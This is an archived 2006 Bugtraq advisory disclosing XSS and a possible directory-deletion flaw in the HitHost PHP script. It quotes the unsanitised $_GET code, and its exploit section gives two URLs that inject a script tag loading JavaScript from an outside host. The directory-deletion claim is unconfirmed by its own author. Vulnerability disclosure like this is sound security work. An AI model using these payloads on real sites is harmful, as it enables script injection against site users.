lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060306235109.30804.qmail@securityfocus.com>
Date: 6 Mar 2006 23:51:09 -0000
From: retard@...igs.com
To: bugtraq@...urityfocus.com
Subject: histhost v1.0.0 xss and possible rmdir


——– summary
	software: HitHost
	vendors website: http://daverave.64digits.com/index.php?page=hithost
	versions: <= 1.0.0
	class: remote
	status: unpatched
	exploit: available
	solution: not available
	discovered by: retard
	risk level: medium

——– description
	hithost uses $_GET variables in crucial parts of their code causing
	xss vulnerabilities and _possibly_ allowing users to rm dirs chmoded
	to 0777

	in ./admin/deleteuser.php:
15	else
16	{
17	unlink("users/$deleteuser/password.php");
18	unlink("users/$deleteuser/counter.php");
19	rmdir("users/$deleteuser/");
20	echo "The user <b>$deleteuser</b> has been deleted";
21	}
	
	as you see line 19 raises suspision of the possibility of rming 0777 dirs
	i've tried it on on my personal server with no sucess, if someone knows
	of a way let me know.
	
	in ./admin/viewuser.php:
6	$viewuser = $_GET['user'];
7	include("users/$viewuser/counter.php");
8	echo "Username: <b>$viewuser</b><br><br>";
9	echo "Number of counter hits: $hits<br><br>";

	this code is self explanitory, the script does not sanitise the $_GET['user']
	allowing users to easily shove xss into the variable.

——– exploit(s)
	http://example.com/admin/deleteuser.php?user=<script%20src=http://notlegal.ws/xss.js></script>
	http://example.com/admin/viewuser.php?hits=<script%20src=http://notlegal.ws/xss.js></script>

——– credit
	author(s): retard
	email: retard@...igs.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ